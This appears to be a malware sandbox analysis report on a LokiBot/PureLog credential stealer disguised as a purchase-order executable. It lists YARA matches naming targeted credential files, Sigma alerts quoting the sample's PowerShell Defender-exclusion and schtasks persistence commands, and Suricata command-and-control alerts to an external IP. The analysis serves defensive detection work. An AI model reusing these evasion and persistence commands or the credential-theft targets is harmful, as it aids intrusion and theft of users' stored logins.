14.2.VvtddClQv.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
14.2.VvtddClQv.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
14.2.VvtddClQv.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
14.2.VvtddClQv.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.0.PO-0Y9005373R664.exe.6c0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.VvtddClQv.exe.29b9d20.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
10.2.VvtddClQv.exe.29b9d20.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
10.2.VvtddClQv.exe.29b9d20.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.VvtddClQv.exe.29b9d20.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.VvtddClQv.exe.29b9d20.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x5bc48:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
10.2.VvtddClQv.exe.29b9d20.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x48ffb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
10.2.VvtddClQv.exe.29b9d20.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x5860c:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x58854:$a2: last_compatible_version
10.2.VvtddClQv.exe.29b9d20.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x5783f:$des3: 68 03 66 00 00 0x5bc48:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x5bd14:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
10.2.VvtddClQv.exe.29b9d20.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x5ad8e:$f1: FileZilla\recentservers.xml 0x5adce:$f2: FileZilla\sitemanager.xml 0x5903e:$b2: Mozilla\Firefox\Profiles 0x58da8:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x58f52:$s4: logins.json 0x59dfc:$s6: wand.dat 0x5887c:$a1: username_value 0x5886c:$a2: password_value 0x58eb7:$a3: encryptedUsername 0x58f24:$a3: encryptedUsername 0x58eca:$a4: encryptedPassword 0x58f38:$a4: encryptedPassword
0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x5e6ac:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x4ba5f:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x5b070:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x5b2b8:$a2: last_compatible_version
0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x5a2a3:$des3: 68 03 66 00 00 0x5e6ac:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x5e778:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x5d7f2:$f1: FileZilla\recentservers.xml 0x5d832:$f2: FileZilla\sitemanager.xml 0x5baa2:$b2: Mozilla\Firefox\Profiles 0x5b80c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x5b9b6:$s4: logins.json 0x5c860:$s6: wand.dat 0x5b2e0:$a1: username_value 0x5b2d0:$a2: password_value 0x5b91b:$a3: encryptedUsername 0x5b988:$a3: encryptedUsername 0x5b92e:$a4: encryptedPassword 0x5b99c:$a4: encryptedPassword
Click to see the 62 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-0Y9005373R664.exe", ParentImage: C:\Users\user\Desktop\PO-0Y9005373R664.exe, ParentProcessId: 6964, ParentProcessName: PO-0Y9005373R664.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe", ProcessId: 4528, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpD806.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpD806.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\VvtddClQv.exe, ParentImage: C:\Users\user\AppData\Roaming\VvtddClQv.exe, ParentProcessId: 3788, ParentProcessName: VvtddClQv.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpD806.tmp", ProcessId: 6476, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpB962.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpB962.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-0Y9005373R664.exe", ParentImage: C:\Users\user\Desktop\PO-0Y9005373R664.exe, ParentProcessId: 6964, ParentProcessName: PO-0Y9005373R664.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpB962.tmp", ProcessId: 5660, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-0Y9005373R664.exe", ParentImage: C:\Users\user\Desktop\PO-0Y9005373R664.exe, ParentProcessId: 6964, ParentProcessName: PO-0Y9005373R664.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe", ProcessId: 4528, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpB962.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpB962.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-0Y9005373R664.exe", ParentImage: C:\Users\user\Desktop\PO-0Y9005373R664.exe, ParentProcessId: 6964, ParentProcessName: PO-0Y9005373R664.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpB962.tmp", ProcessId: 5660, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:19.308276+0200
SID:	2021641
Severity:	1
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:19.308276+0200
SID:	2025381
Severity:	1
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:03.565317+0200
SID:	2021641
Severity:	1
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:03.565317+0200
SID:	2025381
Severity:	1
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:29.944426+0200
SID:	2024313
Severity:	1
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:29.944426+0200
SID:	2024318
Severity:	1
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:01.038490+0200
SID:	2021641
Severity:	1
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:01.038490+0200
SID:	2025381
Severity:	1
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:44.823782+0200
SID:	2021641
Severity:	1
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:44.823782+0200
SID:	2025381
Severity:	1
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:14.298157+0200
SID:	2021641
Severity:	1
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:14.298157+0200
SID:	2025381
Severity:	1
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:16.846754+0200
SID:	2021641
Severity:	1
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:16.846754+0200
SID:	2025381
Severity:	1
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:14.840104+0200
SID:	2024313
Severity:	1
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:14.840104+0200
SID:	2024318
Severity:	1
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:32.405549+0200
SID:	2024313
Severity:	1
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:32.405549+0200
SID:	2024318
Severity:	1
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:11.041687+0200
SID:	2024313
Severity:	1
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:11.041687+0200
SID:	2024318
Severity:	1
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:29.282132+0200
SID:	2021641
Severity:	1
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:29.282132+0200
SID:	2025381
Severity:	1
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:05.911113+0200
SID:	2024313
Severity:	1
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:05.911113+0200
SID:	2024318
Severity:	1
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:06.065702+0200
SID:	2021641
Severity:	1
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:06.065702+0200
SID:	2025381
Severity:	1
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:20.114259+0200
SID:	2021641
Severity:	1
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:20.114259+0200
SID:	2025381
Severity:	1
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:07.063527+0200
SID:	2024313
Severity:	1
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:07.063527+0200
SID:	2024318
Severity:	1
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:16.695709+0200
SID:	2024313
Severity:	1
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:16.695709+0200
SID:	2024318
Severity:	1
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:25.029294+0200
SID:	2024313
Severity:	1
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:25.029294+0200
SID:	2024318
Severity:	1
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:24.159761+0200
SID:	2024313
Severity:	1
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:24.159761+0200
SID:	2024318
Severity:	1
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:54.762512+0200
SID:	2024313
Severity:	1
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:54.762512+0200
SID:	2024318
Severity:	1
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:29.124410+0200
SID:	2024313
Severity:	1
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:29.124410+0200
SID:	2024318
Severity:	1
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:39.676820+0200
SID:	2024313
Severity:	1
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:39.676820+0200
SID:	2024318
Severity:	1
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:02:56.085560+0200
SID:	2021641
Severity:	1
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:02:56.085560+0200
SID:	2025381
Severity:	1
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:26.573742+0200
SID:	2024313
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:26.573742+0200
SID:	2024318
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:37.279739+0200
SID:	2024313
Severity:	1
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:37.279739+0200
SID:	2024318
Severity:	1
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:24.315194+0200
SID:	2021641
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:24.315194+0200
SID:	2025381
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:02:53.568454+0200
SID:	2021641
Severity:	1
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:02:53.568454+0200
SID:	2025381
Severity:	1
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:11.192104+0200
SID:	2021641
Severity:	1
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:11.192104+0200
SID:	2025381
Severity:	1
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:17.720151+0200
SID:	2021641
Severity:	1
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:17.720151+0200
SID:	2025381
Severity:	1
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:54.915658+0200
SID:	2021641
Severity:	1
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:54.915658+0200
SID:	2025381
Severity:	1
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:08.690898+0200
SID:	2021641
Severity:	1
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:08.690898+0200
SID:	2025381
Severity:	1
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:59.879049+0200
SID:	2021641
Severity:	1
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:59.879049+0200
SID:	2025381
Severity:	1
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:57.235849+0200
SID:	2024313
Severity:	1
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

